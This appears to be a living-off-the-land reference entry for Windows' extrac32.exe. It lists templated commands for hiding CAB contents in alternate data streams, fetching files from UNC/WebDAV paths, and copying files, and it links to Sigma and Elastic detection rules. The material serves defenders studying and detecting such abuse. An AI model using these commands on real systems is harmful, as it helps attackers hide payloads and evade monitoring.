Extrac32.exe

Extract to ADS, copy or overwrite a file with Extrac32.exe

Paths

• C:\Windows\System32\extrac32.exe
• C:\Windows\SysWOW64\extrac32.exe

Commands

ADS

Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.

Use case: Extract data from cab file and hide it in an alternate data stream.

Privileges: User

extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe

ADS

Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.

Use case: Extract data from cab file and hide it in an alternate data stream.

Privileges: User

extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exe

Download

Copy the source file to the destination file and overwrite it.

Use case: Download file from UNC/WEBDav

Privileges: User

extrac32 /Y /C {PATH_SMB} {PATH_ABSOLUTE}

Copy

Command for copying file from one folder to another

Use case: Copy file

Privileges: User

extrac32.exe /C {PATH_ABSOLUTE:.source.exe} {PATH_ABSOLUTE:.dest.exe}

Detection

• Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
• Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml
• Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml

Resources

• https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
• https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
• https://twitter.com/egre55/status/985994639202283520